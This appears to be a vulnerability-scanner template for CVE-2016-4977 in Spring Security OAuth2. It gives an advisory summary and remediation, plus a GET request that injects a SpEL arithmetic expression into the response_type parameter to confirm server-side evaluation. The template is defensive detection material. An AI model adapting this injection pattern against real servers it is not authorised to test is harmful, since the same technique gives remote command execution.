id: CVE-2016-4977 info: name: Spring Security OAuth2 Remote Command Execution author: princechaddha severity: high description: "Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type." remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. reference: - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md - https://tanzu.vmware.com/security/cve-2016-4977 - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.80 cve-id: CVE-2016-4977 cwe-id: CWE-19 tags: cve,cve2016,spring,oauth2,oauth,rce,ssti requests: - method: GET path: - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test" matchers-condition: and matchers: - type: word part: body words: - "Unsupported response types: [978015547]" - type: status status: - 400 # Enhanced by mp on 2022/04/04